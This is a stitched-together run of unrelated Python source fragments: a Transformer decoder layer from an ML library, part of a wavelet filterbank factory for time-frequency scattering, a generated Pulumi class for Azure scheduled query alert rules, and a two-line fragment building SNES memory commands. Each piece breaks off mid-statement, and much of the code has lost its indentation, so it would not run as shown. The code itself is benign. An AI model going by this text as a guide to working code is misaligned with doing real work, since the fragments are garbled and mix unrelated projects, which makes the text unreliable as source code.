    p.Define('source_dim', 1024, 'Dimension of encoder outputs.')
    p.Define('model_dim', 1024, 'Model dimension that applies to embedding '
             'layers and all Transformer layers.')
    p.Define('num_trans_layers', 6, 'Number of Transformer layers.')
    p.Define(
        'trans_tpl', layers_with_attention.TransformerLayer.Params(),
        'Transformer layer params. '
        ' Can be a list. num_trans_layers should be divisible by '
        'len(trans_tpl).')
    p.Define('input_dropout_prob', 0.0, 'Prob at which we do input dropout.')
    p.Define(
        'is_transparent', False, 'If set, expects a tensor of shape '
        '[time, batch, source_dim, num_trans_layers] as source encodings.')
    p.Define(
        'add_multiheaded_attention_scalar_summary', False,
        'If set, will include scalar summaries for multi-headed attention'
        ' to visualize the sparsity statistics of attention weights.')
    # TODO(miachen): Extend this to more general logic of adding multiple
    # embedding fields.
    p.Define('task_emb', None, 'Task embedding layer params.')
    p.Define('init_step_ids', False,
             'Initializes beam search with first target id instead of <s>.')
    # MASS pretraining related (https://github.com/microsoft/MASS)
    p.Define(
        'use_lang_dependent_atten', False, 'If True, attention between '
        'encoder and decoder is language dependent.')

    # Default config for the token embedding.
    p.token_emb.vocab_size = 32000
    p.token_emb.embedding_dim = p.model_dim
    p.token_emb.max_num_shards = 16
    # Scale init by 1/sqrt(dim), matching the usual Transformer embedding init.
    p.token_emb.params_init = py_utils.WeightInit.Gaussian(
        1.0 / math.sqrt(p.token_emb.embedding_dim))
    p.token_emb.scale_sqrt_depth = True

    # Default config for the position embedding.
    p.position_emb.embedding_dim = p.model_dim

    # Default config for the transformer layers.
    p.trans_tpl.source_dim = p.model_dim
    p.trans_tpl.tr_atten_tpl.source_dim = p.model_dim
    p.trans_tpl.tr_atten_tpl.num_attention_heads = 8
    p.trans_tpl.tr_fflayer_tpl.input_dim = p.model_dim
    p.trans_tpl.tr_fflayer_tpl.hidden_dim = 2048

    # Default config for beam search.
    p.target_seq_len = 300
    p.beam_search.length_normalization = 0.5
    p.beam_search.coverage_penalty = 0.0
    p.beam_search.batch_major_state = False

    return p
@base_layer.initializer
def __init__(self, params):
super(TransformerDecoder, self).__init__(params)
p = self.params
if p.softmax.cls == layers.SharedSoftmaxLayer:
self._token_emb_vocab_size = p.softmax.num_classes
self._token_emb_dim = p.model_dim
self._share_sm_emb = True
else:
self._token_emb_vocab_size = p.token_emb.vocab_size
self._token_emb_dim = p.token_emb.embedding_dim
self._share_sm_emb = False
assert self._token_emb_vocab_size == p.softmax.num_classes
assert self._token_emb_dim == p.position_emb.embedding_dim
if p.model_dim != self._token_emb_dim:
tf.logging.warning('token_emb.embedding_dim != model_dim (%s vs. %s), '
'creating a projection!')
proj_p = layers.ProjectionLayer.Params().Copy()
proj_p.name = 'emb_proj'
proj_p.input_dim = p.token_emb.embedding_dim
proj_p.output_dim = p.model_dim
self.CreateChild('emb_proj', proj_p)
if p.use_lang_dependent_atten and p.task_emb:
p.trans_tpl.num_aux_atten_post_proj = p.task_emb.vocab_size
p.softmax.input_dim = p.model_dim
if self._share_sm_emb:
# Taking shared emb/softmax layer out of the decoder variable scope so
# that it can also be shared by encoder if needed.
with tf.variable_scope('shared_emb', reuse=tf.AUTO_REUSE):
self.CreateChild('softmax', p.softmax)
with tf.variable_scope(p.name):
if not self._share_sm_emb:
self.CreateChild('token_emb', p.token_emb)
self.CreateChild('position_emb', p.position_emb)
if p.task_emb:
assert p.task_emb.embedding_dim == self._token_emb_dim
self.CreateChild('task_emb', p.task_emb)
dropout_tpl = layers.DropoutLayer.Params()
dropout_tpl.keep_prob = (1.0 - p.input_dropout_prob)
self.CreateChild('input_dropout', dropout_tpl)
params_trans_layers = []
denom = 1
if isinstance(p.trans_tpl, list):
denom = len(p.trans_tpl)
assert p.num_trans_layers % denom == 0
for i in range(p.num_trans_layers // denom):
if isinstance(p.trans_tpl, list):
for q in p.trans_tpl:
params = q.Copy()
params_trans_layers.append(params)
else:
params = p.trans_tpl.Copy()
params_trans_layers.append(params)
for i, params in enumerate(params_trans_layers):
params.name = 'trans_layer_%d' % i
params.packed_input = p.packed_input
params.has_aux_atten = True
params.mask_self_atten = True
self.CreateChildren('trans', params_trans_layers)
if not self._share_sm_emb:
self.CreateChild('softmax', p.softmax)
def _ExpandToNumHyps(self, source_enc_len, num_hyps_per_beam):
"""Repeat each value according to num hyps.
Args:
source_enc_len: source encoder length; int [batch].
num_hyps_per_beam: number of hypotheses
Returns:
New version of source_enc_len; int [batch * num_hyps_per_beam].
Target_batch is (num_hyps_per_beam * batch).
Example: src_enc_len = [3, 2, 1] and num_hyps_per_beam = 2
--> [3, 2, 1, 3, 2, 1]
"""
x = tf.tile(input=source_enc_len, multiples=[num_hyps_per_beam])
return x
  def _RemoveEOSProbs(self, p, probs, source_enc_len):
    """Remove the attention probs on EOS symbol and renormalize.

    Args:
      p: decoder params.
      probs: attention probs matrix; float [batch, target_len, source_len].
      source_enc_len: source encoder length; int [batch].

    Returns:
      probs with value on last actual token (EOS token) replaced by 0 and
      renormalized so that final dim (src_len) sums to 1 again; float
      [batch, target_len, source_len].
    """
    batch = py_utils.GetShape(probs)[0]
    source_enc_len = py_utils.HasShape(source_enc_len, [batch])

    # Set -1 values
    target_len = py_utils.GetShape(probs)[1]
    replacements = tf.ones([py_utils.GetShape(probs)[0], target_len],
                           dtype=py_utils.FPropDtype(p)) * (-1)

    # Build [batch, target_len, 3] scatter indices addressing, for every
    # (batch, target) pair, the source position of the last actual token.
    index_0 = tf.reshape(tf.range(batch), shape=[batch, 1, 1])
    index_0 *= tf.ones(shape=[batch, target_len, 1], dtype=tf.int32)

    index_1 = tf.ones(shape=[batch, 1], dtype=tf.int32)
    index_1 *= tf.expand_dims(tf.range(target_len), 0)
    index_1 = tf.expand_dims(index_1, -1)

    index_2 = tf.reshape(source_enc_len, shape=[batch, 1, 1]) - 1  # Note the -1
    index_2 = tf.cast(index_2, tf.int32)
    index_2 *= tf.ones(shape=[batch, target_len, 1], dtype=tf.int32)

    index = tf.concat([index_0, index_1, index_2], axis=2)

    # Original update matrix contained -1 values. Change all to 1 except for
    # those positions coming from scatter which will be 0.
    # (i.e. `updates` is a multiplicative mask: 1 everywhere, 0 at EOS.)
    updates = tf.scatter_nd(
        index, updates=replacements, shape=py_utils.GetShape(probs))
    updates += 1
    res = probs * updates

    # Normalize to that probs sum to 1.
    # Add eps to sum to deal with case where all probs except last one are 0.
    # In this case then, attention probs will not sum to 1 but this seems still
    # better then evenly distributing attention probs in this case.
    s = tf.reduce_sum(res, axis=2, keepdims=True)
    epsilon = tf.constant(value=1e-6, dtype=py_utils.FPropDtype(p))
    s += epsilon
    res /= s
    return res
def _FProp(self, theta, encoder_outputs, targets):
"""Decodes `targets` given encoded source.
Args:
theta: A `.NestedMap` object containing weights' values of this layer and
its children layers.
encoder_outputs: a NestedMap computed by encoder. Expected to contain:
encoded - source encoding. When `p.is_transparent` is False, it is a
tensor of shape [time, batch, depth]. When `p.is_transparent`
is True, it is a tensor of shape
[time, batch, depth, num_trans_layers] if `self.do_eval` is
True, and a list of `num_trans_layers` tensors of shape
[time, batch, depth] if `self.do_eval` is False.
padding - source encoding's padding, of shape [time, batch].
segment_id - source segment id, of shape [time, batch].
targets: A dict of string to tensors representing the targets one try to
predict. Each tensor in targets is of shape [batch, time].
Returns:
A `.NestedMap` containing output of last decoder layer and attention probs
- softmax_input: Tensor of shape [time, batch, params.softmax.input_dim].
- attention: `.NestedMap` of attention distributions of shape
[batch, target_length, source_length].
"""
p = self.params
source_encs = encoder_outputs.encoded
source_paddings = encoder_outputs.padding
src_segment_id = getattr(encoder_outputs, 'segment_id', None)
time, batch = py_utils.GetShape(source_paddings, 2)
if p.is_transparent:
if self.do_eval:
source_encs = py_utils.HasShape(
source_encs, [time, batch, p.source_dim, p.num_trans_layers])
source_encs = tf.unstack(source_encs, axis=3)
else:
assert isinstance(source_encs, list)
assert len(source_encs) == p.num_trans_layers
for i in range(p.num_trans_layers):
source_encs[i] = py_utils.HasShape(source_encs[i],
[time, batch, p.source_dim])
else:
source_encs = py_utils.HasShape(source_encs, [time, batch, p.source_dim])
source_encs = [source_encs] * p.num_trans_layers
with tf.name_scope(p.name):
# [batch, time]
target_ids = targets.ids
# [time, batch]
target_paddings = tf.transpose(targets.paddings)
target_segment_pos = None
target_segment_id = None
if p.packed_input:
target_segment_id = tf.transpose(targets.segment_ids)
target_segment_pos = targets.segment_pos
assert src_segment_id is not None, ('Need to provide src_segment_id '
'for packed input.')
# Embedding layer
# [batch, time, model_dim]
if not self._share_sm_emb:
token_embs = self.token_emb.EmbLookup(theta.token_emb, target_ids)
else:
token_embs = self.softmax.EmbLookup(theta.softmax, target_ids)
target_time = py_utils.GetShape(target_ids)[1]
# [1, time, model_dim]
if p.packed_input:
posit_embs = self.position_emb.FPropWithPosition(
theta.position_emb, target_segment_pos)
else:
posit_embs = tf.expand_dims(
self.position_emb.FProp(theta.position_emb, target_time), 0)
# [time, batch, model_dim]
input_embs = token_embs + posit_embs
atten_idx = None
if p.task_emb:
if p.use_lang_dependent_atten:
atten_idx = targets.task_ids
# | |
not sufficing) is ruled out by later assertion, `pads_built`.
# Frontend also assures this in `compute_padding_fr`, and/or via
# `scale_diff_max_to_build`
repeat_last_built_id(scale_diff, scale_diff_last_built)
continue
elif (scale_diff_max_to_build is not None and
scale_diff > scale_diff_max_to_build):
assert scale_diff not in j1_frs, j1_frs
# ensure `scale_diff` didn't exceed a global maximum.
# subsequent `scale_diff` are only greater, so
# we could `break`, but still need to `repeat_last_built_id`
repeat_last_built_id(scale_diff, scale_diff_last_built)
continue
# extract params to iterate
n_psi = len(j1_frs[scale_diff])
params = []
for n1_fr in range(n_psi):
xi = xi1_frs[ scale_diff][n1_fr]
sigma = sigma1_frs[scale_diff][n1_fr]
padded_len = 2**J_pad_frs[scale_diff] # repeat for all n1_fr
params.append((xi, sigma, padded_len))
# if already built, point to it and don't rebuild
if params in params_built:
repeat_last_built_id(scale_diff, scale_diff_last_built)
continue
# build wavelets #####################################################
psis_up = []
for n1_fr in range(n_psi):
# ensure we compute at valid `N_fr_scale`, `n1_fr`
if first_scale:
# always built
pass
elif (sampling_psi_fr == 'exclude' and
# this means the wavelet (sampled at J_pad_frs_max_init)
# exceeded max permitted width at this scale,
# i.e. `width > 2**N_fr_scale`
(scale_diff not in j1_frs or
n1_fr > len(j1_frs[scale_diff]) - 1)):
# subsequent `scale_diff` are only greater, and
# hence `len(j1_frs[scale_diff])` only lesser
# above conditional shouldn't be possible to satisfy but is
# kept for clarity
raise Exception("impossible iteration")
break # would happen if condition was met; kept for clarity
#### Compute wavelet #############################################
# fetch wavelet params, sample wavelet
xi, sigma, padded_len = params[n1_fr]
# expand dim to multiply along freq like (2, 32, 4) * (32, 1)
psi = morlet_1d(padded_len, xi, sigma, normalize=normalize_fr,
P_max=P_max, eps=eps)[:, None]
psis_up.append(psi)
# if all `n1_fr` built, register & append to filterbank ##############
if first_scale:
psi_ids[0] = 0
else:
psi_ids[scale_diff] = psi_ids[scale_diff_last_built] + 1
params_built.append(params)
scale_diff_last_built = scale_diff
# append to filterbank
psi_id = psi_ids[scale_diff]
psi1_f_fr_up[psi_id] = psis_up
# compute spin down by time-reversing spin up in frequency domain
psi1_f_fr_dn[psi_id] = [time_reverse_fr(p) for p in psis_up]
##########################################################################
# ensure every unique `N_fr_scale` has a filterbank
n_scales = len(N_fr_scales_unique)
assert len(psi_ids) == n_scales, (psi_ids, N_fr_scales_unique)
# validate `scale_diff_max_to_build`
if scale_diff_max_to_build is not None:
assert scale_diff_last_built <= scale_diff_max_to_build
# guaranteed by "J_pad_frs is non-increasing", which was already asserted
# in `compute_padding_fr()` (base_frontend), but include here for clarity;
# much of above logic assumes this
pads_built = [math.log2(params[0][2]) for params in params_built]
assert min(pads_built) == J_pad_frs[scale_diff_last_built], (
pads_built, J_pad_frs)
# assert "higher psi_id -> lower scale"
# since `params, J_pad_fr = psi_ids_fn(scale_diff)`,
# and `params` and `J_pad_fr` are always same for same `scale_diff`,
# then `params` or `J_pad_fr` (and hence `psi_id`) only change if
# `scale_diff` changes. Namely,
# - if `psi_id` changed, then either `params` or `J_pad_fr` changed
# (which can only happen if `scale_diff` changed),
# - if `scale_diff` changed, then `psi_id` doesn't necessarily change,
# since neither of `params` or `J_pad_fr` necessarily change.
# Thus, "psi_id changed => scale_diff changed", but not conversely.
prev_scale_diff, prev_psi_id = -1, -1
for scale_diff in psi_ids:
if psi_id == prev_psi_id:
# only check against changing `psi_id`, but still track `scale_diff`
prev_scale_diff = scale_diff
continue
assert scale_diff > prev_scale_diff, (scale_diff, prev_scale_diff)
prev_scale_diff, prev_psi_id = scale_diff, psi_id
# instantiate for-later params and reusable kwargs
ca = dict(criterion_amplitude=criterion_amplitude)
s0ca = dict(criterion_amplitude=criterion_amplitude, sigma0=sigma0)
# Embed meta information within the filters
for psi_f in (psi1_f_fr_dn, psi1_f_fr_up):
for field in ('xi', 'sigma', 'j', 'is_cqt', 'support', 'width'):
if field not in psi_f:
psi_f[field] = {}
for scale_diff, psi_id in psi_ids.items():
if psi_id in psi_f[field]:
continue
psi_f[field][psi_id] = []
for n1_fr in range(len(psi_f[psi_id])):
if field == 'support':
p = 2 * compute_temporal_support(
psi_f[psi_id][n1_fr], **ca)
elif field == 'width':
N_fr_scale = N_fr_scales_max - scale_diff
p = 2 * compute_temporal_width(
psi_f[psi_id][n1_fr], N=2**N_fr_scale, **s0ca)
else:
p = psi_fr_params[scale_diff][field][n1_fr]
psi_f[field][psi_id].append(p)
# return results
return psi1_f_fr_up, psi1_f_fr_dn, psi_ids
def phi_fr_factory(J_pad_frs_max_init, J_pad_frs, F, log2_F, unrestricted_pad_fr,
pad_mode_fr, sampling_phi_fr='resample', average_fr=None,
average_fr_global_phi=None, aligned=None,
criterion_amplitude=1e-3, normalize_fr='l1', sigma0=0.1,
P_max=5, eps=1e-7):
"""
Builds in Fourier the lowpass Gabor filters used for JTFS.
Every filter is provided as a dictionary with the following keys:
* 'xi': central frequency, always 0 for low-pass filters.
* 'sigma': frequency-domain width, as passed to the function being sampled
* 'j': subsampling factor from 0 to `log2_F` (or potentially less if
`sampling_phi_fr = 'recalibrate'`).
* 'width': temporal width (scale; interval of imposed invariance)
* 'support': temporal support (duration of decay)
Parameters
----------
J_pad_frs_max_init : int
`2**J_pad_frs_max_init` is the largest length of the filters.
J_pad_frs : dict[int: int]
Lengths at which to sample `gauss_1d`. For 'recalibrate', also
controls time-domain widths (see "Build logic").
F : int
Scale of invariance (in linear units). Controls `sigma` of `phi`
via `sigma0 / F`. For 'recalibrate', `log2_F_phi_diff` means
`sigma0 / F / 2**log2_F_phi_diff` (see "Build logic").
log2_F : int
Scale of invariance (log2(prevpow2(F))). Controls maximum dyadic scale
and subsampling factor for all `phi`.
unrestricted_pad_fr : bool
Used for a quality check; `True` ensures `phi` decays sufficiently
(but not necessarily fully if `pad_mode_fr=='zero'`; see code).
        Including steps outside this function, setting `max_pad_factor != None`
        may override such filter distortion considerations.
pad_mode_fr : str
Used for a quality check.
sampling_phi_fr : str['resample', 'recalibrate']
See "Build logic" below.
average_fr : bool
Used for a sanity check.
average_fr_global_phi : bool
Used for a quality check.
aligned : bool
Used for a sanity check.
criterion_amplitude : float
Used to compute `phi` meta.
sigma0 : float
Together with `F`, determines width (sigma) of `phi`: `sigma = sigma0/F`.
normalize_fr : str
`gauss_1d` parameter `normalize`.
P_max, eps : float, float
`gauss_1d` parameters.
Returns
-------
phi_f_fr : dict[int: dict[int: list[tensor[float]]],
str: dict[int: dict[int: list[int]], float]]
Contains the low-pass filter at all possible lengths, scales of
invariance, and subsampling factors:
phi_f_fr[invariance_scale][input_length][input_subsampling]
<= e.g. =>
phi_f_fr[~log2_F][~J_pad_fr_max][n1_fr_subsample]
and corresponding meta:
            phi_f_fr['support'][log2_F_phi_diff][pad_diff][n1_fr_subsample]
            phi_f_fr['sigma'][log2_F_phi_diff]  # doesn't vary w/ other params
This differs from `Scattering1D.phi_f`. See "Build logic" for details.
Build logic
-----------
We build `phi` for every possible input length (`2**J_pad_fr`), input
    subsampling factor (`n1_fr_subsample`), and ('recalibrate' only) scale
of invariance. Structured as
`phi_f_fr[log2_F_phi_diff][pad_diff][sub]`
    where `log2_F_phi_diff == log2_F - log2_F_phi`. Hence,
higher `log2_F_phi_diff`
<=>
greater *contraction* (time-domain) of original phi
<=>
lower `log2_F_phi`, lower permitted max subsampling
Higher `pad_diff` is a greater *trimming* (time-domain) of the corresponding
lowpass.
- 'resample': `log2_F_diff == 0`, always.
- 'recalibrate': `log2_F_diff` spans from `min(log2_F, J_pad_fr)` to
`log2_F`. Not all of these will be used, but we compute every possible
combination to avoid figuring out which will be.
'resample' enforces global scale of invariance (`==F` for all coefficients).
'recalibrate' "follows" the scale of `psi`, as controlled by
`total_conv_stride_over_U1`, averaging less for finer filterbanks.
"""
# compute the spectral parameters of the filters
sigma_low = sigma0 / F
N_init = 2**J_pad_frs_max_init
zero_stride_globally = bool(not average_fr and aligned)
    def compute_all_subsamplings(phi_f_fr, pad_diff, log2_F_phi, log2_F_phi_diff):
        # Append, in place, periodized (i.e. subsampled-in-time) copies of the
        # base lowpass `phi_f_fr[log2_F_phi_diff][pad_diff][0]`, one for every
        # subsampling factor 2**sub with 1 <= sub <= log2_F_phi.
        for sub in range(1, 1 + log2_F_phi):
            phi_f_fr[log2_F_phi_diff][pad_diff].append(
                periodize_filter_fourier(phi_f_fr[log2_F_phi_diff][pad_diff][0],
                                         nperiods=2**sub))
# initial lowpass
phi_f_fr = {0: {}}
# expand dim to multiply along freq like (2, 32, 4) * (32, 1)
phi_f_fr[0][0] = [gauss_1d(N_init, sigma_low, P_max=P_max, eps=eps)[:, None]]
compute_all_subsamplings(phi_f_fr, pad_diff=0, log2_F_phi=log2_F,
log2_F_phi_diff=0)
# reusable
common_kw = dict(normalize=normalize_fr, P_max=P_max, eps=eps)
# lowpass filters at all possible input lengths ##########################
pads_iterated = []
for J_pad_fr in list(J_pad_frs.values())[::-1]:
if J_pad_fr == -1:
continue
# avoid recomputation
if J_pad_fr in pads_iterated:
continue
pads_iterated.append(J_pad_fr)
# validate J_pad_fr
if sampling_phi_fr == 'resample' and not zero_stride_globally:
# guaranteed by design:
# - 'resample': total_conv_stride_over_U1 >= log2_F
# - J_pad_fr = max(, total_conv_stride_over_U1)
# exception is `not average_fr and aligned`, but we force
# `max(, log2_F)` in frontend
assert J_pad_fr >= log2_F, (J_pad_fr, log2_F)
pad_diff = J_pad_frs_max_init - J_pad_fr
if sampling_phi_fr == 'resample':
phi_f_fr[0][pad_diff] = [
gauss_1d(2**J_pad_fr, sigma_low, **common_kw)[:, None]]
# dedicate separate filters for *subsampled* as opposed to *trimmed*
# inputs (i.e. `n1_fr_subsample` vs `J_pad_frs_max_init - J_pad_fr`)
compute_all_subsamplings(phi_f_fr, pad_diff, log2_F_phi=log2_F,
log2_F_phi_diff=0)
elif sampling_phi_fr == 'recalibrate':
# These won't differ from plain subsampling but we still
# build each `log2_F_phi_diff` separately with its own subsampling
# to avoid excessive bookkeeping.
# `phi[::factor] == gauss_1d(N // factor, sigma_low * factor)`
# when not aliased.
| |
<filename>sdk/python/pulumi_azure_native/insights/v20210201preview/scheduled_query_rule.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ScheduledQueryRuleArgs', 'ScheduledQueryRule']
@pulumi.input_type
class ScheduledQueryRuleArgs:
def __init__(__self__, *,
criteria: pulumi.Input['ScheduledQueryRuleCriteriaArgs'],
enabled: pulumi.Input[bool],
resource_group_name: pulumi.Input[str],
scopes: pulumi.Input[Sequence[pulumi.Input[str]]],
actions: Optional[pulumi.Input['ActionsArgs']] = None,
auto_mitigate: Optional[pulumi.Input[bool]] = None,
check_workspace_alerts_storage_configured: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
evaluation_frequency: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'Kind']]] = None,
location: Optional[pulumi.Input[str]] = None,
mute_actions_duration: Optional[pulumi.Input[str]] = None,
override_query_time_range: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[float]] = None,
skip_query_validation: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
window_size: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ScheduledQueryRule resource.
:param pulumi.Input['ScheduledQueryRuleCriteriaArgs'] criteria: The rule criteria that defines the conditions of the scheduled query rule.
:param pulumi.Input[bool] enabled: The flag which indicates whether this scheduled query rule is enabled. Value should be true or false
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scopes: The list of resource id's that this scheduled query rule is scoped to.
:param pulumi.Input['ActionsArgs'] actions: Actions to invoke when the alert fires.
:param pulumi.Input[bool] auto_mitigate: The flag that indicates whether the alert should be automatically resolved or not. The default is true. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[bool] check_workspace_alerts_storage_configured: The flag which indicates whether this scheduled query rule should be stored in the customer's storage. The default is false. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[str] display_name: The display name of the alert rule
:param pulumi.Input[str] evaluation_frequency: How often the scheduled query rule is evaluated represented in ISO 8601 duration format. Relevant and required only for rules of the kind LogAlert.
:param pulumi.Input[Union[str, 'Kind']] kind: Indicates the type of scheduled query rule. The default is LogAlert.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[str] mute_actions_duration: Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[str] override_query_time_range: If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods). Relevant only for rules of the kind LogAlert.
:param pulumi.Input[str] rule_name: The name of the rule.
:param pulumi.Input[float] severity: Severity of the alert. Should be an integer between [0-4]. Value of 0 is severest. Relevant and required only for rules of the kind LogAlert.
:param pulumi.Input[bool] skip_query_validation: The flag which indicates whether the provided query should be validated or not. The default is false. Relevant only for rules of the kind LogAlert.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_resource_types: List of resource type of the target resource(s) on which the alert is created/updated. For example if the scope is a resource group and targetResourceTypes is Microsoft.Compute/virtualMachines, then a different alert will be fired for each virtual machine in the resource group which meet the alert criteria. Relevant only for rules of the kind LogAlert
:param pulumi.Input[str] window_size: The period of time (in ISO 8601 duration format) on which the Alert query will be executed (bin size). Relevant and required only for rules of the kind LogAlert.
"""
pulumi.set(__self__, "criteria", criteria)
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "scopes", scopes)
if actions is not None:
pulumi.set(__self__, "actions", actions)
if auto_mitigate is not None:
pulumi.set(__self__, "auto_mitigate", auto_mitigate)
if check_workspace_alerts_storage_configured is not None:
pulumi.set(__self__, "check_workspace_alerts_storage_configured", check_workspace_alerts_storage_configured)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if evaluation_frequency is not None:
pulumi.set(__self__, "evaluation_frequency", evaluation_frequency)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if location is not None:
pulumi.set(__self__, "location", location)
if mute_actions_duration is not None:
pulumi.set(__self__, "mute_actions_duration", mute_actions_duration)
if override_query_time_range is not None:
pulumi.set(__self__, "override_query_time_range", override_query_time_range)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if skip_query_validation is not None:
pulumi.set(__self__, "skip_query_validation", skip_query_validation)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if target_resource_types is not None:
pulumi.set(__self__, "target_resource_types", target_resource_types)
if window_size is not None:
pulumi.set(__self__, "window_size", window_size)
@property
@pulumi.getter
def criteria(self) -> pulumi.Input['ScheduledQueryRuleCriteriaArgs']:
"""
The rule criteria that defines the conditions of the scheduled query rule.
"""
return pulumi.get(self, "criteria")
@criteria.setter
def criteria(self, value: pulumi.Input['ScheduledQueryRuleCriteriaArgs']):
pulumi.set(self, "criteria", value)
@property
@pulumi.getter
def enabled(self) -> pulumi.Input[bool]:
"""
The flag which indicates whether this scheduled query rule is enabled. Value should be true or false
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def scopes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of resource id's that this scheduled query rule is scoped to.
"""
return pulumi.get(self, "scopes")
@scopes.setter
def scopes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "scopes", value)
@property
@pulumi.getter
def actions(self) -> Optional[pulumi.Input['ActionsArgs']]:
"""
Actions to invoke when the alert fires.
"""
return pulumi.get(self, "actions")
@actions.setter
def actions(self, value: Optional[pulumi.Input['ActionsArgs']]):
pulumi.set(self, "actions", value)
@property
@pulumi.getter(name="autoMitigate")
def auto_mitigate(self) -> Optional[pulumi.Input[bool]]:
"""
The flag that indicates whether the alert should be automatically resolved or not. The default is true. Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "auto_mitigate")
@auto_mitigate.setter
def auto_mitigate(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_mitigate", value)
@property
@pulumi.getter(name="checkWorkspaceAlertsStorageConfigured")
def check_workspace_alerts_storage_configured(self) -> Optional[pulumi.Input[bool]]:
"""
The flag which indicates whether this scheduled query rule should be stored in the customer's storage. The default is false. Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "check_workspace_alerts_storage_configured")
@check_workspace_alerts_storage_configured.setter
def check_workspace_alerts_storage_configured(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "check_workspace_alerts_storage_configured", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The display name of the alert rule
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="evaluationFrequency")
def evaluation_frequency(self) -> Optional[pulumi.Input[str]]:
"""
How often the scheduled query rule is evaluated represented in ISO 8601 duration format. Relevant and required only for rules of the kind LogAlert.
"""
return pulumi.get(self, "evaluation_frequency")
@evaluation_frequency.setter
def evaluation_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "evaluation_frequency", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[Union[str, 'Kind']]]:
"""
Indicates the type of scheduled query rule. The default is LogAlert.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[Union[str, 'Kind']]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="muteActionsDuration")
def mute_actions_duration(self) -> Optional[pulumi.Input[str]]:
"""
Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired. Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "mute_actions_duration")
@mute_actions_duration.setter
def mute_actions_duration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mute_actions_duration", value)
@property
@pulumi.getter(name="overrideQueryTimeRange")
def override_query_time_range(self) -> Optional[pulumi.Input[str]]:
"""
If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods). Relevant only for rules of the kind LogAlert.
"""
return pulumi.get(self, "override_query_time_range")
@override_query_time_range.setter
def override_query_time_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "override_query_time_range", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def severity(self) -> Optional[pulumi.Input[float]]:
"""
Severity of the alert. Should be an integer between [0-4]. Value of 0 is severest. Relevant and required only for rules of the kind LogAlert.
"""
return pulumi.get(self, "severity")
@severity.setter
def severity(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "severity", value)
@property
@pulumi.getter(name="skipQueryValidation")
def skip_query_validation(self) -> Optional[pulumi.Input[bool]]:
"""
The flag which indicates whether the provided query should be validated or not. The default is false. Relevant only for rules of the | |
0x7E0000 - WRAM_START):
cmd += b'\xA9' # LDA
